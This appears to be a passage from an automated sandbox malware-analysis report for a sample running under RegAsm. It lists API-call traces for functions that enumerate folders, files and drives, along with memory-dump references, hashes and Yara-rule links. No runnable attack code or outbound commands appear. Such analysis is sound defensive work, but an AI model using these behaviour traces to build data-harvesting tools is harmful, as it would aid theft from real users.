                                                                                    • _EH_prolog.MSVCRT ref: 0040D3FF
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                      • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040A893: _EH_prolog.MSVCRT ref: 0040A898
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 2625060131-0
                                                                                    • Opcode ID: 376a3a712f82bb87cd6dc28791a904098dcfe9595fc6229afb21645f8f31d16a
                                                                                    • Instruction ID: c334b669d827ce9460b6e052bb784494c4e07a697f8de2f8e66076f210601346
                                                                                    • Opcode Fuzzy Hash: 376a3a712f82bb87cd6dc28791a904098dcfe9595fc6229afb21645f8f31d16a
                                                                                    • Instruction Fuzzy Hash: 63915F71D0024CEACF11EBE5D952BDEBBB8AF14308F10417EE44573282DA78570C8B66
                                                                                    Function 0040A893 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040A898
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00409F72: _EH_prolog.MSVCRT ref: 00409F77
                                                                                      • Part of subcall function 00409F72: FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00425BAE,00000000,-00000020,00000000), ref: 00409FF6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$FileFindFirstlstrcpy
                                                                                    • String ID:
                                                                                    • API String ID: 1592259726-0
                                                                                    • Opcode ID: 04f1566bf03f5b57a7be48995494788b674163e3f1712f7d1c8d8cfa6d3f667e
                                                                                    • Instruction ID: 11f6703c6529ff65c6027a0a45f3fdb3f97caadc550874a50ef78dc79f4eaafe
                                                                                    • Opcode Fuzzy Hash: 04f1566bf03f5b57a7be48995494788b674163e3f1712f7d1c8d8cfa6d3f667e
                                                                                    • Instruction Fuzzy Hash: F62171B1900249EBDF20FFA9C9067DDBFB4AF45314F00416EE88963281D7795708CBA6
                                                                                    Function 00401ED6 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00401EDB
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00401162: _EH_prolog.MSVCRT ref: 00401167
                                                                                      • Part of subcall function 00401162: FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00422374,?,?,?,00422370,?,?,00000000,?,00000000), ref: 004013AC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$FileFindFirstlstrcpy
                                                                                    • String ID:
                                                                                    • API String ID: 1592259726-0
                                                                                    • Opcode ID: 07963b33fdd111526faf395668dc4852c6ae53a02adfa156883a701ca86dbaae
                                                                                    • Instruction ID: 28e08b363bcf4c13626f635e6ad0a869a568ad08ab8b3845b1d26a2f95c805ed
                                                                                    • Opcode Fuzzy Hash: 07963b33fdd111526faf395668dc4852c6ae53a02adfa156883a701ca86dbaae
                                                                                    • Instruction Fuzzy Hash: 4A215071D00249ABDF20FB69C94679DBFB4AF44714F00452EE89873282DB395749CBD6
                                                                                    Function 00415A3A Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00415A3F
                                                                                      • Part of subcall function 00412D62: _EH_prolog.MSVCRT ref: 00412D67
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00415843: _EH_prolog.MSVCRT ref: 00415848
                                                                                      • Part of subcall function 00415843: GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004158AA
                                                                                      • Part of subcall function 00415843: memset.MSVCRT ref: 004158C9
                                                                                      • Part of subcall function 00415843: GetDriveTypeA.KERNEL32(?), ref: 004158D2
                                                                                      • Part of subcall function 00415843: lstrcpy.KERNEL32(?,00000000), ref: 004158F2
                                                                                      • Part of subcall function 00415843: lstrcpy.KERNEL32(?,00000000), ref: 00415933
                                                                                      • Part of subcall function 00415843: lstrlenA.KERNEL32(?), ref: 00415998
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$Drivelstrcpy$LogicalStringsTypelstrlenmemset
                                                                                    • String ID:
                                                                                    • API String ID: 373919974-0
                                                                                    • Opcode ID: 247ae862db0cd230e0fc40c152aa8d8d011cf82cb158f3200b1f7138d282f6a1
                                                                                    • Instruction ID: 6a8f297f6f97b9a3cf0514685df13ca52355f4dbaeb7c4ae4b28d527b4ace486
                                                                                    • Opcode Fuzzy Hash: 247ae862db0cd230e0fc40c152aa8d8d011cf82cb158f3200b1f7138d282f6a1
                                                                                    • Instruction Fuzzy Hash: 5E01C031C00249DBCF20EBA8C9827EEBBB0EF40354F10411AE854A3281C7385B84C7D6
                                                                                    Function 00410D6D Relevance: 1.3, APIs: 1, Instructions: 32memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocLocal
                                                                                    • String ID:
                                                                                    • API String ID: 3494564517-0
                                                                                    • Opcode ID: 0ae6c29a3e0a6eb9c824dd13ba767ccc85b4e312debc44e2b21ad53b1228ad09
                                                                                    • Instruction ID: 7dcd19726911a1004ec6e1e6dff555a45da34f101be8258439f6e1c6d27db954
                                                                                    • Opcode Fuzzy Hash: 0ae6c29a3e0a6eb9c824dd13ba767ccc85b4e312debc44e2b21ad53b1228ad09
                                                                                    • Instruction Fuzzy Hash: AAF05C35601610DB871209599C00AE7775BABC6B10708411BDE8C8B304C5B0ECC142E0

                                                                                    Non-executed Functions

                                                                                    Function 6CC46C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CC46CCC
                                                                                    • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CC46D11
                                                                                    • moz_xmalloc.MOZGLUE(0000000C), ref: 6CC46D26
                                                                                      • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                                    • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6CC46D35
                                                                                    • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CC46D53
                                                                                    • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6CC46D73
                                                                                    • free.MOZGLUE(00000000), ref: 6CC46D80
                                                                                    • CertGetNameStringW.CRYPT32 ref: 6CC46DC0
                                                                                    • moz_xmalloc.MOZGLUE(00000000), ref: 6CC46DDC
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CC46DEB
                                                                                    • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6CC46DFF
                                                                                    • CertFreeCertificateContext.CRYPT32(00000000), ref: 6CC46E10
                                                                                    • CryptMsgClose.CRYPT32(00000000), ref: 6CC46E27
                                                                                    • CertCloseStore.CRYPT32(00000000,00000000), ref: 6CC46E34
                                                                                    • CreateFileW.KERNEL32 ref: 6CC46EF9
                                                                                    • moz_xmalloc.MOZGLUE(00000000), ref: 6CC46F7D
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CC46F8C
                                                                                    • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6CC4709D
                                                                                    • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CC47103
                                                                                    • free.MOZGLUE(00000000), ref: 6CC47153
                                                                                    • CloseHandle.KERNEL32(?), ref: 6CC47176
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC47209
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC4723A
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC4726B
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC4729C
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC472DC
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC4730D
                                                                                    • memset.VCRUNTIME140(?,00000000,00000110), ref: 6CC473C2
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC473F3
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC473FF
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC47406
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC4740D
                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6CC4741A
                                                                                    • moz_xmalloc.MOZGLUE(?), ref: 6CC4755A
                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC47568
                                                                                    • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6CC47585
                                                                                    • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CC47598
                                                                                    • free.MOZGLUE(00000000), ref: 6CC475AC
                                                                                      • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                                      • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                    • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                    • API String ID: 3256780453-3980470659
                                                                                    • Opcode ID: a43fcaac022fb778192a291195d200fc41c50660bb0b5041e876488aff6ce664
                                                                                    • Instruction ID: b2ad0393ad0a2950369a9f34186a438842b6a6ed6c24aff6d90f3e4af8f3011c
                                                                                    • Opcode Fuzzy Hash: a43fcaac022fb778192a291195d200fc41c50660bb0b5041e876488aff6ce664
                                                                                    • Instruction Fuzzy Hash: 9B52C3B5A002149FEB21DF65CC84BAA77B8FF46704F10C199E909A7640EB71AF85CF91
                                                                                    Function 6CC7F070 Relevance: 59.9, APIs: 30, Strings: 4, Instructions: 412threadtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC7F09B
                                                                                      • Part of subcall function 6CC55B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CC556EE,?,00000001), ref: 6CC55B85
                                                                                      • Part of subcall function 6CC55B50: EnterCriticalSection.KERNEL32(6CCBF688,?,?,?,6CC556EE,?,00000001), ref: 6CC55B90
                                                                                      • Part of subcall function 6CC55B50: LeaveCriticalSection.KERNEL32(6CCBF688,?,?,?,6CC556EE,?,00000001), ref: 6CC55BD8
                                                                                      • Part of subcall function 6CC55B50: GetTickCount64.KERNEL32 ref: 6CC55BE4
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6CC7F0AC
                                                                                      • Part of subcall function 6CC55C50: GetTickCount64.KERNEL32 ref: 6CC55D40
                                                                                      • Part of subcall function 6CC55C50: EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC55D67
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6CC7F0BE
                                                                                      • Part of subcall function 6CC55C50: __aulldiv.LIBCMT ref: 6CC55DB4
                                                                                      • Part of subcall function 6CC55C50: LeaveCriticalSection.KERNEL32(6CCBF688), ref: 6CC55DED
                                                                                    • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6CC7F155
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F1E0
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F1ED
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F212
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F229
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F231
                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6CC7F248
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F2AE
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F2BB
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F2F8
                                                                                      • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                                      • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                                      • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F350
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F35D
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F381
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F398
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F3A0
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F489
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F491
                                                                                      • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                                      • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6CC7F3CF
                                                                                      • Part of subcall function 6CC7F070: GetCurrentThreadId.KERNEL32 ref: 6CC7F440
                                                                                      • Part of subcall function 6CC7F070: AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F44D
                                                                                      • Part of subcall function 6CC7F070: ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F472
                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6CC7F4A8
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F559
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F561
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F577
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F585
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F5A3
                                                                                    Strings
                                                                                    • [I %d/%d] profiler_pause_sampling, xrefs: 6CC7F3A8
                                                                                    • [I %d/%d] profiler_resume_sampling, xrefs: 6CC7F499
                                                                                    • [I %d/%d] profiler_resume, xrefs: 6CC7F239
                                                                                    • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6CC7F56A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
                                                                                    • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                    • API String ID: 565197838-2840072211
                                                                                    • Opcode ID: 589ce5dd8be659e0a4885ea65a7401d2daef75430740c39d40621bcb45f8e8c9
                                                                                    • Instruction ID: d9f5fd634b95f1a07382b130cba07e18aeef792666b300a5973f8d0c8ac5d279
                                                                                    • Opcode Fuzzy Hash: 589ce5dd8be659e0a4885ea65a7401d2daef75430740c39d40621bcb45f8e8c9
                                                                                    • Instruction Fuzzy Hash: FDD1383D7042148FDB109FF9D4987AAB7B8EB46328F14451AF95593F81EB705808CBBA
                                                                                    Function 6CC464C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6CC464DF
                                                                                    • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6CC464F2
                                                                                    • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6CC46505
                                                                                    • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6CC46518
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll), ref: 6CC4652B
                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6CC4671C
                                                                                    • GetCurrentProcess.KERNEL32 ref: 6CC46724
                                                                                    • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CC4672F
                                                                                    • GetCurrentProcess.KERNEL32 ref: 6CC46759
                                                                                    • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CC46764
                                                                                    • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6CC46A80
                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6CC46ABE
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC46AD3
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC46AE8
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC46AF7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
